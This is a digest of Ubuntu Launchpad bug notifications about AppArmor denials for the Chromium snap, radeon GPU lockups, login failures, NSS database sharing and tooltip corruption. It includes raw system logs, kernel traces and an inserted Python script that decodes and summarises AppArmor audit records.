00:20:55 millbarge audit: PROCTITLE proctitle=2F736E61702F6368726F6D69756D2F313032362F7573722F6C69622F6368726F6D69756D2D62726F777365722F6368726F6D65202D2D6E6F2D64656661756C742D62726F777365722D636865636B202D2D6E6F2D66697273742D72756E202D2D70617373776F72642D73746F7265 Feb 21 00:20:58 millbarge bash[4126190]: Fri, 21 Feb 2020 00:20:58 + src 46 (fix: 3) currently receiving: 0,1@0 0,13@0 0,15@0 0,17@0 0,19@0 0,24@0 0,30@0 1,133@0 1,138@0 2,1@1 2,9@1 2,18@1 2,21@1 2,26@1 3,23@0 3,27@0 3,28@0 Feb 21 00:21:05 millbarge audit[4014267]: AVC apparmor="DENIED" operation="open" profile="snap.chromium.chromium" name=2F686F6D652F7361726E6F6C642F736E61702F6368726F6D69756D2F313032362F2E636F6E6669672F6368726F6D69756D2F44656661756C742F53796E6320446174612F53796E63446174612E73716C697465332D6A6F75726E616C pid=4014267 comm="Chrome_SyncThre" requested_mask="wc" denied_mask="wc" fsuid=1000 ouid=1000 Feb 21 00:21:05 millbarge audit[4014267]: SYSCALL arch=c03e syscall=257 success=no exit=-13 a0=ff9c a1=7f4318004cce a2=80042 a3=180 items=2 ppid=4014264 pid=4014267 auid=1000 uid=1000 gid=1000 euid=1000 suid=1000 fsuid=1000 egid=1000 sgid=1000 fsgid=1000 tty=(none) ses=1 comm="Chrome_SyncThre" exe="/snap/chromium/1026/usr/lib/chromium-browser/chrome" key="access" Feb 21 00:21:05 millbarge audit: CWD cwd="/home/sarnold" Feb 21 00:21:05 millbarge audit: PATH item=0 name=2F686F6D652F7361726E6F6C642F736E61702F6368726F6D69756D2F313032362F2E636F6E6669672F6368726F6D69756D2F44656661756C742F53796E6320446174612F inode=4782436 dev=00:3d mode=040700 ouid=1000 ogid=1000 rdev=00:00 nametype=PARENT cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0 cap_frootid=0 Feb 21 00:21:05 millbarge audit: PATH item=1 name=2F686F6D652F7361726E6F6C642F736E61702F6368726F6D69756D2F313032362F2E636F6E6669672F6368726F6D69756D2F44656661756C742F53796E6320446174612F53796E63446174612E73716C697465332D6A6F75726E616C inode=4890128 dev=00:3d mode=0100600 ouid=1000 ogid=1000 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0 
cap_frootid=0 Feb 21 00:21:05 millbarge audit: PROCTITLE proctitle=2F736E61702F6368726F6D69756D2F313032362F7573722F6C69622F6368726F6D69756D2D62726F777365722F6368726F6D65202D2D6E6F2D64656661756C742D62726F777365722D636865636B202D2D6E6F2D66697273742D72756E202D2D70617373776F72642D73746F7265 Feb 21 00:21:15 millbarge audit[4014267]: AVC apparmor="DENIED" operation="open" profile="snap.chromium.chromium" name=2F686F6D652F7361726E6F6C642F736E61702F6368726F6D69756D2F313032362F2E636F6E6669672F6368726F6D69756D2F44656661756C742F53796E6320446174612F53796E63446174612E73716C697465332D6A6F75726E616C pid=4014267 comm="Chrome_SyncThre" requested_mask="wc" denied_mask="wc" fsuid=1000 ouid=1000 Feb 21 00:21:15 millbarge audit[4014267]: SYSCALL arch=c03e syscall=257 success=no exit=-13 a0=ff9c a1=7f4318004cce a2=80042 a3=180 items=2 ppid=4014264 pid=4014267 auid=1000 uid=1000 gid=1000 euid=1000 suid=1000
[Desktop-packages] [Bug 1864127] Re: apparmor denies ~/snap/chromium/ writes
$ aa-decode 2F686F6D652F7361726E6F6C642F736E61702F6368726F6D69756D2F313032362F2E636F6E6669672F6368726F6D69756D2F44656661756C742F53796E6320446174612F53796E63446174612E73716C697465332D6A6F75726E616C
Decoded: /home/sarnold/snap/chromium/1026/.config/chromium/Default/Sync Data/SyncData.sqlite3-journal

This sounds like perhaps the snap was refreshed while it was running. If so, it should be fixed with refresh-app-awareness in snapd, which is actively being worked on.

-- You received this bug notification because you are a member of Desktop Packages, which is subscribed to chromium-browser in Ubuntu. https://bugs.launchpad.net/bugs/1864127 Title: apparmor denies ~/snap/chromium/ writes Status in chromium-browser package in Ubuntu: New
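The decoding step from the aa-decode comment above, applied to whole audit records, as an added example that is not part of the original thread or of the AppArmor tools. It decodes the bare-hex fields, counts denials per profile and path, and lists paths under a snap revision other than the one passed in; the function names, the sample records (built from fields shown in the report) and the revision 1036 are assumptions made for illustration.

```python
"""Decode hex-encoded fields in AppArmor audit records and tally denials."""
import re
from collections import Counter

# key=value pairs: a value is either "quoted" or a bare token without spaces
_PAIR = re.compile(r'(\w+)=("[^"]*"|\S+)')
_HEX = re.compile(r'(?:[0-9A-Fa-f]{2})+')
# Fields the kernel logs quoted when harmless and as bare hex when they hold
# spaces, quotes or control characters (here: the space in "Sync Data")
_UNTRUSTED = {"name", "comm", "exe", "cwd", "proctitle"}
# ~/snap/<snap name>/<revision>/..., the layout of the decoded path in the report
_SNAP_HOME = re.compile(r'^/home/[^/]+/snap/([^/]+)/([^/]+)/')


def _escape(text):
    """Escape non-printable characters so a hostile file name cannot forge output lines."""
    return "".join(c if c.isprintable() else c.encode("unicode_escape").decode("ascii")
                   for c in text)


def decode_field(key, raw):
    """Return the readable value of one audit field."""
    if len(raw) >= 2 and raw[0] == '"' and raw[-1] == '"':
        return raw[1:-1]
    if key in _UNTRUSTED and _HEX.fullmatch(raw):
        data = bytes.fromhex(raw).replace(b"\x00", b" ")  # proctitle may use NUL separators
        return _escape(data.decode("utf-8", errors="backslashreplace"))
    return raw  # numbers, (none), masks and so on are left untouched


def parse_record(line):
    """Split one audit log line into a dict of decoded fields."""
    return {key: decode_field(key, raw) for key, raw in _PAIR.findall(line)}


def summarize_denials(lines):
    """Count AppArmor denials per (profile, decoded path, denied mask)."""
    counts = Counter()
    for line in lines:
        rec = parse_record(line)
        if rec.get("apparmor") == "DENIED":
            counts[(rec.get("profile"), rec.get("name"), rec.get("denied_mask"))] += 1
    return counts


def snap_revision(path):
    """Return (snap name, revision) for a path under ~/snap/<name>/<revision>/."""
    match = _SNAP_HOME.match(path or "")
    return (match.group(1), match.group(2)) if match else None


def denials_outside_revision(counts, snap, current_revision):
    """List denied paths that sit under a revision other than current_revision."""
    hits = []
    for (_profile, path, _mask), seen in counts.items():
        found = snap_revision(path)
        if found and found[0] == snap and found[1] not in (current_revision, "common", "current"):
            hits.append((path, found[1], seen))
    return sorted(hits)


# Constructed sample: the decoded path from the comment, re-encoded the way the log shows it
SAMPLE_PATH = ("/home/sarnold/snap/chromium/1026/.config/chromium/Default/"
               "Sync Data/SyncData.sqlite3-journal")
SAMPLE_HEX = SAMPLE_PATH.encode().hex().upper()


def _avc(timestamp):
    return (f'Feb 21 {timestamp} millbarge audit[4014267]: AVC apparmor="DENIED" '
            f'operation="open" profile="snap.chromium.chromium" name={SAMPLE_HEX} '
            'pid=4014267 comm="Chrome_SyncThre" requested_mask="wc" denied_mask="wc" '
            'fsuid=1000 ouid=1000')


SAMPLE_LOG = [
    _avc("00:20:55"),
    'Feb 21 00:20:55 millbarge audit: CWD cwd="/home/sarnold"',
    _avc("00:21:05"),
    _avc("00:21:15"),
]

if __name__ == "__main__":
    totals = summarize_denials(SAMPLE_LOG)
    for (profile, path, mask), seen in totals.items():
        print(f"{seen}x {profile} denied {mask} on {path}")
    # "1036" is a made-up current revision; on a real system take it from `snap list`
    for path, revision, seen in denials_outside_revision(totals, "chromium", "1036"):
        print(f"revision {revision} is not current: {path} ({seen} denials)")
```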
[Desktop-packages] [Bug 1285444] Re: Login Successful, Desktop Never Loads
Running into this issue on 19.10, so none of the unity-specific solutions work. If I switch TTY with ctrl+alt+F1, after I try to log back in and just see the desktop background, I'm brought to login screen again, but this time log in is successful. Disabling all gnome extensions doesn't seem to help. Happens every time after suspending laptop. Not sure if this is helpful or relevant, but I tried looking at the following logs: % journalctl -e /usr/bin/gnome-shell Feb 16 12:15:05 tula-Z gnome-shell[2114]: JS WARNING: [resource:///org/gnome/gjs/modules/signals.js 135]: Too many arguments to method Clutter.Actor.destroy: expected 0, got Feb 16 12:15:05 tula-Z gnome-shell[2114]: JS WARNING: [resource:///org/gnome/gjs/modules/signals.js 135]: Too many arguments to method Clutter.Actor.destroy: expected 0, got Feb 16 12:15:15 tula-Z gnome-shell[2114]: An active wireless connection, in infrastructure mode, involves no access point? Feb 16 12:15:15 tula-Z gnome-shell[2114]: An active wireless connection, in infrastructure mode, involves no access point? Feb 16 12:15:26 tula-Z gnome-shell[8675]: Failed to obtain high priority context Feb 16 12:15:26 tula-Z gnome-shell[8675]: Failed to obtain high priority context Feb 16 12:15:27 tula-Z gnome-shell[8675]: Unset XDG_SESSION_ID, getCurrentSessionProxy() called outside a user session. Asking logind directly. 
Feb 16 12:15:27 tula-Z gnome-shell[8675]: Will monitor session c3 Feb 16 12:15:27 tula-Z gnome-shell[8675]: Getting invalid resource scale property Feb 16 12:15:27 tula-Z gnome-shell[8675]: ibus_bus_hello: assertion 'ibus_bus_is_connected (bus)' failed Feb 16 12:15:27 tula-Z gnome-shell[8675]: Error while sending AddMatch() message: The connection is closed Feb 16 12:15:27 tula-Z gnome-shell[8675]: ibus_bus_call_async: assertion 'ibus_bus_is_connected (bus)' failed Feb 16 12:15:27 tula-Z gnome-shell[8675]: Getting invalid resource scale property Feb 16 12:15:27 tula-Z gnome-shell[8675]: ibus_bus_hello: assertion 'ibus_bus_is_connected (bus)' failed Feb 16 12:15:27 tula-Z gnome-shell[8675]: Error while sending AddMatch() message: The connection is closed Feb 16 12:15:27 tula-Z gnome-shell[8675]: ibus_bus_call_async: assertion 'ibus_bus_is_connected (bus)' failed Feb 16 12:15:27 tula-Z gnome-shell[8675]: ibus_bus_call_async: assertion 'ibus_bus_is_connected (bus)' failed Feb 16 12:15:28 tula-Z gnome-shell[8675]: Error looking up permission: GDBus.Error:org.freedesktop.portal.Error.NotFound: No entry for geolocation Feb 16 12:15:28 tula-Z gnome-shell[8675]: JS WARNING: [resource:///org/gnome/shell/ui/windowManager.js 1640]: reference to undefined property "MetaWindowXwayland" Feb 16 12:15:27 tula-Z gnome-shell[8675]: ibus_bus_call_async: assertion 'ibus_bus_is_connected (bus)' failed Feb 16 12:15:28 tula-Z gnome-shell[8675]: Error looking up permission: GDBus.Error:org.freedesktop.portal.Error.NotFound: No entry for geolocation Feb 16 12:15:28 tula-Z gnome-shell[8675]: JS WARNING: [resource:///org/gnome/shell/ui/windowManager.js 1640]: reference to undefined property "MetaWindowXwayland" Feb 16 12:15:28 tula-Z gnome-shell[8675]: Registering session with GDM Feb 16 12:15:34 tula-Z gnome-shell[2114]: [AppIndicatorSupport-DEBUG] Registering StatusNotifierItem :1.180/org/ayatana/NotificationItem/software_update_available Feb 16 12:15:34 tula-Z gnome-shell[2114]: 
[AppIndicatorSupport-DEBUG] Registering StatusNotifierItem :1.90/org/ayatana/NotificationItem/dropbox_client_2433 Feb 16 12:15:34 tula-Z gnome-shell[2114]: [AppIndicatorSupport-FATAL] unable to update overlay icon Feb 16 12:15:34 tula-Z gnome-shell[2114]: [AppIndicatorSupport-FATAL] unable to update overlay icon Feb 16 12:15:34 tula-Z gnome-shell[2114]: [AppIndicatorSupport-FATAL] unable to update overlay icon Feb 16 12:15:34 tula-Z gnome-shell[2114]: [AppIndicatorSupport-FATAL] unable to update overlay icon Hope this is helpful! -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to at-spi2-core in Ubuntu. https://bugs.launchpad.net/bugs/1285444 Title: Login Successful, Desktop Never Loads Status in at-spi2-core package in Ubuntu: Triaged Bug description: Here is what I encounter 1. Boot computer, boot proceeds normally 2. Reach standard Ubuntu login screen, nothing seems to be amiss 3. Enter user name and password 4. Login disappears, just see the pink "Ubuntu 14.04" background The desktop never loads, not even after ~30 minutes. The launcher never appears, and the Desktop background never changes to the user- configured background. Other features: * Cursor works fine, it can be moved around the screen * No error messages pop up * ALT+F1 etc. can be used to switch to different TTYs; all files on the system appear to be intact * Print screen button works (I will upload a screen shot when I get a chance to copy it onto a USB drive) * Hitting power button pops up a window prompting the
[Desktop-packages] [Bug 1863390] [NEW] GPU lockup ring 0 stalled for more than X msec
Public bug reported: Since the update: xserver-xorg-video-ati-hwe-18.04 (1:19.0.1-1ubuntu1~18.04.1) bionic; which resulted from: https://bugs.launchpad.net/fedora/+source/xserver-xorg-video- ati/+bug/1841718 I've experienced GPU freezes where all video becomes unresponsive, both Xorg and Ctrl+Alt terminal switching, and the GPU fan goes to full. I am still able to access the system via SSH. Sometimes dmesg ends up full of this message repeating over and over: radeon :01:00.0: ring 0 stalled for more than 24040msec radeon :01:00.0: GPU lockup (current fence id 0x9e44 last fence id 0x9e49 on ring 0) I sometimes get a few GPU soft reset which seem to fail in drm(?): radeon :01:00.0: Saved 110839 dwords of commands on ring 0. radeon :01:00.0: GPU softreset: 0x0008 ... radeon :01:00.0: Wait for MC idle timedout ! radeon :01:00.0: Wait for MC idle timedout ! [drm] PCIE GART of 1024M enabled (table at 0x00162000). radeon :01:00.0: WB enabled radeon :01:00.0: fence driver on ring 0 use gpu addr 0x4c00 and cpu addr 0x725651ad radeon :01:00.0: fence driver on ring 3 use gpu addr 0x4c0c and cpu addr 0xc3678ed8 radeon :01:00.0: fence driver on ring 5 use gpu addr 0x00072118 and cpu addr 0xdbd9e01b [drm:r600_ring_test [radeon]] *ERROR* radeon: ring 0 test failed (scratch(0x8504)=0xCAFEDEAD) [drm:evergreen_resume [radeon]] *ERROR* evergreen startup failed on resume Even if the above reset doesn't happen, this freeze always results in a unable to handle page fault" BUG in radeon_ring_backup, entered from various call paths, eg: BUG: unable to handle page fault for address: bc2d80574ffc ... Oops: [#1] SMP PTI CPU: 2 PID: 11243 Comm: kworker/2:1H Not tainted 5.5.0-050500-generic #202001262030 Workqueue: radeon-crtc radeon_flip_work_func [radeon] RIP: 0010:radeon_ring_backup+0xc9/0x140 [radeon] Call Trace: radeon_gpu_reset+0xc3/0x2f0 [radeon] radeon_flip_work_func+0x1f3/0x250 [radeon] ? 
__schedule+0x2e0/0x760 process_one_work+0x1b5/0x370 worker_thread+0x50/0x3d0 kthread+0x104/0x140 ? process_one_work+0x370/0x370 ? kthread_park+0x90/0x90 ret_from_fork+0x35/0x40 or: BUG: unable to handle page fault for address: c03901000ffc ... Oops: [#1] SMP PTI CPU: 3 PID: 2227 Comm: compton Not tainted 5.3.0-28-generic #30~18.04.1-Ubuntu RIP: 0010:radeon_ring_backup+0xd3/0x140 [radeon] Call Trace: radeon_gpu_reset+0xb9/0x340 [radeon] ? dma_fence_wait_timeout+0x48/0x110 ? reservation_object_wait_timeout_rcu+0x19d/0x340 radeon_gem_handle_lockup.part.4+0xe/0x20 [radeon] radeon_gem_wait_idle_ioctl+0xa6/0x110 [radeon] ? radeon_gem_busy_ioctl+0x80/0x80 [radeon] drm_ioctl_kernel+0xb0/0x100 [drm] drm_ioctl+0x389/0x450 [drm] ? radeon_gem_busy_ioctl+0x80/0x80 [radeon] ? __switch_to_asm+0x40/0x70 ? __switch_to_asm+0x34/0x70 ? __switch_to_asm+0x40/0x70 ? __switch_to_asm+0x40/0x70 ? __switch_to_asm+0x34/0x70 ? __switch_to_asm+0x40/0x70 ? __switch_to_asm+0x34/0x70 ? __switch_to_asm+0x40/0x70 radeon_drm_ioctl+0x4f/0x80 [radeon] do_vfs_ioctl+0xa9/0x640 ? __schedule+0x2b0/0x670 ksys_ioctl+0x75/0x80 __x64_sys_ioctl+0x1a/0x20 do_syscall_64+0x5a/0x130 entry_SYSCALL_64_after_hwframe+0x44/0xa9 I've tried both 5.3.0-28-generic and 5.5.0-050500-generic from kernel- ppa but that made no difference. It appears to be a bug in radeon. Nothing specific makes this happen, just regular usage with a compositing window manager. I'm not playing games or particularly exercising the GPU. The last two times I was just reading in web browser. It's also happened in the middle of the night while I was asleep. Sometimes I have a few days uptime, sometimes it happens in less than 24 hours from boot. This never happened before the radeon update mentioned on the first line. I'll attach two files of dmesg output. As per https://wiki.ubuntu.com/X/Troubleshooting/Freeze I've installed and started apport for next time it happens. 
** Affects: xserver-xorg-video-ati (Ubuntu) Importance: Undecided Status: New -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to xserver-xorg-video-ati in Ubuntu. https://bugs.launchpad.net/bugs/1863390 Title: GPU lockup ring 0 stalled for more than X msec Status in xserver-xorg-video-ati package in Ubuntu: New Bug description: Since the update: xserver-xorg-video-ati-hwe-18.04 (1:19.0.1-1ubuntu1~18.04.1) bionic; which resulted from: https://bugs.launchpad.net/fedora/+source/xserver-xorg-video- ati/+bug/1841718 I've experienced GPU freezes where all video becomes unresponsive, both Xorg and Ctrl+Alt terminal switching, and the GPU fan goes to full. I am still able to access the system via SSH. Sometimes dmesg ends up full of this message repeating over and over: radeon :01:00.0: ring
[Desktop-packages] [Bug 1863390] Re: GPU lockup ring 0 stalled for more than X msec
** Attachment added: "dmesg-2020-02-14.txt" https://bugs.launchpad.net/ubuntu/+source/xserver-xorg-video-ati/+bug/1863390/+attachment/5328273/+files/dmesg-2020-02-14.txt -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to xserver-xorg-video-ati in Ubuntu. https://bugs.launchpad.net/bugs/1863390 Title: GPU lockup ring 0 stalled for more than X msec Status in xserver-xorg-video-ati package in Ubuntu: New
[Desktop-packages] [Bug 1863390] Re: GPU lockup ring 0 stalled for more than X msec
** Attachment added: "dmesg-2020-02-15.txt"
   https://bugs.launchpad.net/ubuntu/+source/xserver-xorg-video-ati/+bug/1863390/+attachment/5328274/+files/dmesg-2020-02-15.txt

--
You received this bug notification because you are a member of Desktop Packages, which is subscribed to xserver-xorg-video-ati in Ubuntu.
https://bugs.launchpad.net/bugs/1863390

Title: GPU lockup ring 0 stalled for more than X msec
Status in xserver-xorg-video-ati package in Ubuntu: New

Bug description:
  Since the update:
  xserver-xorg-video-ati-hwe-18.04 (1:19.0.1-1ubuntu1~18.04.1) bionic;
  which resulted from:
  https://bugs.launchpad.net/fedora/+source/xserver-xorg-video-ati/+bug/1841718

  I've experienced GPU freezes where all video becomes unresponsive, both Xorg and Ctrl+Alt terminal switching, and the GPU fan goes to full. I am still able to access the system via SSH.

  Sometimes dmesg ends up full of this message repeating over and over:

  radeon :01:00.0: ring 0 stalled for more than 24040msec
  radeon :01:00.0: GPU lockup (current fence id 0x9e44 last fence id 0x9e49 on ring 0)

  I sometimes get a few GPU soft reset which seem to fail in drm(?):

  radeon :01:00.0: Saved 110839 dwords of commands on ring 0.
  radeon :01:00.0: GPU softreset: 0x0008
  ...
  radeon :01:00.0: Wait for MC idle timedout !
  radeon :01:00.0: Wait for MC idle timedout !
  [drm] PCIE GART of 1024M enabled (table at 0x00162000).
  radeon :01:00.0: WB enabled
  radeon :01:00.0: fence driver on ring 0 use gpu addr 0x4c00 and cpu addr 0x725651ad
  radeon :01:00.0: fence driver on ring 3 use gpu addr 0x4c0c and cpu addr 0xc3678ed8
  radeon :01:00.0: fence driver on ring 5 use gpu addr 0x00072118 and cpu addr 0xdbd9e01b
  [drm:r600_ring_test [radeon]] *ERROR* radeon: ring 0 test failed (scratch(0x8504)=0xCAFEDEAD)
  [drm:evergreen_resume [radeon]] *ERROR* evergreen startup failed on resume

  Even if the above reset doesn't happen, this freeze always results in an "unable to handle page fault" BUG in radeon_ring_backup, entered from various call paths, eg:

  BUG: unable to handle page fault for address: bc2d80574ffc
  ...
  Oops: [#1] SMP PTI
  CPU: 2 PID: 11243 Comm: kworker/2:1H Not tainted 5.5.0-050500-generic #202001262030
  Workqueue: radeon-crtc radeon_flip_work_func [radeon]
  RIP: 0010:radeon_ring_backup+0xc9/0x140 [radeon]
  Call Trace:
   radeon_gpu_reset+0xc3/0x2f0 [radeon]
   radeon_flip_work_func+0x1f3/0x250 [radeon]
   ? __schedule+0x2e0/0x760
   process_one_work+0x1b5/0x370
   worker_thread+0x50/0x3d0
   kthread+0x104/0x140
   ? process_one_work+0x370/0x370
   ? kthread_park+0x90/0x90
   ret_from_fork+0x35/0x40

  or:

  BUG: unable to handle page fault for address: c03901000ffc
  ...
  Oops: [#1] SMP PTI
  CPU: 3 PID: 2227 Comm: compton Not tainted 5.3.0-28-generic #30~18.04.1-Ubuntu
  RIP: 0010:radeon_ring_backup+0xd3/0x140 [radeon]
  Call Trace:
   radeon_gpu_reset+0xb9/0x340 [radeon]
   ? dma_fence_wait_timeout+0x48/0x110
   ? reservation_object_wait_timeout_rcu+0x19d/0x340
   radeon_gem_handle_lockup.part.4+0xe/0x20 [radeon]
   radeon_gem_wait_idle_ioctl+0xa6/0x110 [radeon]
   ? radeon_gem_busy_ioctl+0x80/0x80 [radeon]
   drm_ioctl_kernel+0xb0/0x100 [drm]
   drm_ioctl+0x389/0x450 [drm]
   ? radeon_gem_busy_ioctl+0x80/0x80 [radeon]
   ? __switch_to_asm+0x40/0x70
   ? __switch_to_asm+0x34/0x70
   ? __switch_to_asm+0x40/0x70
   ? __switch_to_asm+0x40/0x70
   ? __switch_to_asm+0x34/0x70
   ? __switch_to_asm+0x40/0x70
   ? __switch_to_asm+0x34/0x70
   ? __switch_to_asm+0x40/0x70
   radeon_drm_ioctl+0x4f/0x80 [radeon]
   do_vfs_ioctl+0xa9/0x640
   ? __schedule+0x2b0/0x670
   ksys_ioctl+0x75/0x80
   __x64_sys_ioctl+0x1a/0x20
   do_syscall_64+0x5a/0x130
   entry_SYSCALL_64_after_hwframe+0x44/0xa9

  I've tried both 5.3.0-28-generic and 5.5.0-050500-generic from kernel-ppa but that made no difference. It appears to be a bug in radeon.

  Nothing specific makes this happen, just regular usage with a compositing window manager. I'm not playing games or particularly exercising the GPU. The last two times I was just reading in a web browser. It's also happened in the middle of the night while I was asleep. Sometimes I have a few days uptime, sometimes it happens in less than 24 hours from boot. This never happened before the radeon update mentioned on the first line.

  I'll attach two files of dmesg output. As per https://wiki.ubuntu.com/X/Troubleshooting/Freeze I've installed and started apport for next time it happens.

To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/xserver-xorg-video-ati/+bug/1863390/+subscriptions
[Desktop-packages] [Bug 1859643] Re: [snap] cannot use shared NSS db
OTOH, I think it makes sense to allow for the ability to share ~/.pki/nssdb (and yes, a personal-files addition along with a snap change (perhaps just a symlink from $SNAP_USER_DATA/.pki/nssdb to ~/.pki/nssdb would be enough rather than patching?).

For read access, I have no problem with using personal-files to read the nssdb into $SNAP_USER_DATA, with auto-connection.

For write, chromium is not the clear owner of this directory, so I would be hesitant to recommend it as a default since IMO, chromium shouldn't be writing out to these files even in non-snap situations (again, perfectly reasonable to merge in changes if the user desires). I for one would be rather surprised to install a certificate via chromium and have it reflected in my session-wide nssdb for another application (eg, libvirt).

Furthermore, there is nothing saying that nssdb might not change format incompatibly with nss in the chromium snap and software installed on the system. This is not theoretical: rather than using a single nssdb in the user's global ~/.pki/nssdb dir, firefox, for example, instead stores per-profile certN.db files in ~/.mozilla/firefox//* and in my profile dirs I have a mixture of cert8.db and cert9.db. I do see that chromium only has cert9.db, so perhaps this is handled by the library itself (again, someone would need to verify), but then there is nssdb skew if some applications are writing to certN-1.db, some to certN.db and others to certN+1.db.

--
You received this bug notification because you are a member of Desktop Packages, which is subscribed to chromium-browser in Ubuntu.
https://bugs.launchpad.net/bugs/1859643

Title: [snap] cannot use shared NSS db
Status in chromium-browser package in Ubuntu: Triaged

Bug description:
  (initially reported at https://askubuntu.com/questions/1202861/chromium-does-not-show-certificates-from-pki-nssdb)

  Chromium can theoretically use the shared NSS db at ~/.pki/nssdb, but the snap confinement prevents it from actually using the shared db (it reads and writes to $SNAP/.pki/nssdb instead).

  Shared certificates can be inspected by browsing to chrome://settings/certificates.

  Really accessing the shared db would require an additional read/write personal-files plug on $HOME/.pki/nssdb, and patching GetDefaultConfigDirectory() in crypto/nss_util.cc.

To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/chromium-browser/+bug/1859643/+subscriptions
[Desktop-packages] [Bug 1860282] Re: corrupted desktop tooltips
*** This bug is a duplicate of bug 1841718 ***
    https://bugs.launchpad.net/bugs/1841718

After a little more investigation, this is resolved on https://bugs.launchpad.net/fedora/+source/xserver-xorg-video-ati/+bug/1841718 and the fix is currently in ppa:canonical-x/x-staging

** This bug has been marked a duplicate of bug 1841718
   [radeon] Rendering of combo boxes and tooltips is broken

--
You received this bug notification because you are a member of Desktop Packages, which is subscribed to xserver-xorg-video-ati in Ubuntu.
https://bugs.launchpad.net/bugs/1860282

Title: corrupted desktop tooltips
Status in xserver-xorg-video-ati package in Ubuntu: Confirmed

Bug description:
  Desktop tooltips (also browser, apps etc.) are distorted and corrupted for old AMD cards after latest system update and possibly xorg update. Is this a xorg related problem?

  System Info: https://termbin.com/tzn3

  And this is a screencasting of the problem: https://youtu.be/iutIwrM_Lz0

  This is my glxinfo: https://pastebin.com/AMUyf3xa

  PS In linux mint forums there is a bypass of the problem by reverting back to LTS graphic stack, which indeed it works:
  apt install xserver-xorg xserver-xorg-video-all

To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/xserver-xorg-video-ati/+bug/1860282/+subscriptions
[Desktop-packages] [Bug 1860282] Re: corrupted desktop tooltips
I am also seeing the same thing as the screencast. It can be reproduced with tooltips and the Alt+Tab window.

Graphics card: Advanced Micro Devices, Inc. [AMD/ATI] Barts XT [Radeon HD 6870]
Driver package: xserver-xorg-video-ati-hwe-18.04/bionic-updates,now 1:19.0.1-0ubuntu1~18.04.1

--
You received this bug notification because you are a member of Desktop Packages, which is subscribed to xserver-xorg-video-ati in Ubuntu.
https://bugs.launchpad.net/bugs/1860282

Title: corrupted desktop tooltips
Status in xserver-xorg-video-ati package in Ubuntu: Confirmed

To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/xserver-xorg-video-ati/+bug/1860282/+subscriptions
[Desktop-packages] [Bug 1798961] Re: Random unrecoverable freezes on Ubuntu 18.10
Happening to me too. Full details available on this issue: https://github.com/brave/brave-browser/issues/7439

** Bug watch added: github.com/brave/brave-browser/issues #7439
   https://github.com/brave/brave-browser/issues/7439

--
You received this bug notification because you are a member of Desktop Packages, which is subscribed to xserver-xorg-video-intel in Ubuntu.
https://bugs.launchpad.net/bugs/1798961

Title: Random unrecoverable freezes on Ubuntu 18.10
Status in Linux: New
Status in linux package in Ubuntu: Confirmed
Status in xserver-xorg-video-intel package in Ubuntu: Invalid
Status in linux source package in Bionic: Triaged
Status in xserver-xorg-video-intel source package in Bionic: Invalid
Status in linux source package in Cosmic: Triaged
Status in xserver-xorg-video-intel source package in Cosmic: Invalid
Status in linux source package in Disco: Triaged
Status in xserver-xorg-video-intel source package in Disco: Invalid

Bug description:
  First thing I notice is that the mouse cursor freezes as I'm using it, then I hit the CAPS LOCK key and the LED indicator doesn't respond. Then I try the "REISUB" command, but it doesn't do anything either. Only a hard reset works, pressing down the power button for a few seconds.

  How to reproduce? I couldn't figure out a consistent method. It is still random to me.

  Version: Ubuntu 4.18.0-10.11-generic 4.18.12

  System information attached.

  Also happens under Arch Linux and Fedora. I've talked to another user on IRC who seems to be having the same freezes.

  ProblemType: Bug
  DistroRelease: Ubuntu 18.10
  Package: linux-image-4.18.0-10-generic 4.18.0-10.11
  ProcVersionSignature: Ubuntu 4.18.0-10.11-generic 4.18.12
  Uname: Linux 4.18.0-10-generic x86_64
  ApportVersion: 2.20.10-0ubuntu13
  Architecture: amd64
  AudioDevicesInUse:
   USER PID ACCESS COMMAND
   /dev/snd/controlC1: dsilva 1213 F pulseaudio
   /dev/snd/controlC0: dsilva 1213 F pulseaudio
  CurrentDesktop: XFCE
  Date: Sat Oct 20 09:54:50 2018
  InstallationDate: Installed on 2018-10-20 (0 days ago)
  InstallationMedia: Xubuntu 18.10 "Cosmic Cuttlefish" - Release amd64 (20181017.2)
  MachineType: Dell Inc. Inspiron 5458
  ProcFB: 0 inteldrmfb
  ProcKernelCmdLine: BOOT_IMAGE=/vmlinuz-4.18.0-10-generic root=/dev/mapper/xubuntu--vg-root ro quiet splash vt.handoff=1
  RelatedPackageVersions:
   linux-restricted-modules-4.18.0-10-generic N/A
   linux-backports-modules-4.18.0-10-generic N/A
   linux-firmware 1.175
  RfKill:
   0: phy0: Wireless LAN
   Soft blocked: no
   Hard blocked: no
  SourcePackage: linux
  UpgradeStatus: No upgrade log present (probably fresh install)
  dmi.bios.date: 02/02/2018
  dmi.bios.vendor: Dell Inc.
  dmi.bios.version: A15
  dmi.board.name: 09WGNT
  dmi.board.vendor: Dell Inc.
  dmi.board.version: A00
  dmi.chassis.type: 9
  dmi.chassis.vendor: Dell Inc.
  dmi.modalias: dmi:bvnDellInc.:bvrA15:bd02/02/2018:svnDellInc.:pnInspiron5458:pvr01:rvnDellInc.:rn09WGNT:rvrA00:cvnDellInc.:ct9:cvr:
  dmi.product.name: Inspiron 5458
  dmi.product.sku: Inspiron 5458
  dmi.product.version: 01
  dmi.sys.vendor: Dell Inc.

To manage notifications about this bug go to: https://bugs.launchpad.net/linux/+bug/1798961/+subscriptions
[Desktop-packages] [Bug 1849680] Re: audit spam in dmesg (libreoffice)
For the next libreoffice upload, the non-/home read-only accesses all look fine to add to the libreoffice profile.

--
You received this bug notification because you are a member of Desktop Packages, which is subscribed to libreoffice in Ubuntu.
https://bugs.launchpad.net/bugs/1849680

Title: audit spam in dmesg (libreoffice)
Status in libreoffice package in Ubuntu: New

Bug description:
  My dmesg is getting flooded by apparmor audit messages, mostly from libreoffice (profiles libreoffice-soffice and libreoffice-oosplash):

  $ dmesg | tail -n 25
  [13682.452555] audit: type=1400 audit(1571920851.001:3672): apparmor="ALLOWED" operation="open" profile="libreoffice-soffice" name="/usr/share/drirc.d/00-mesa-defaults.conf" pid=17792 comm="soffice.bin" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0
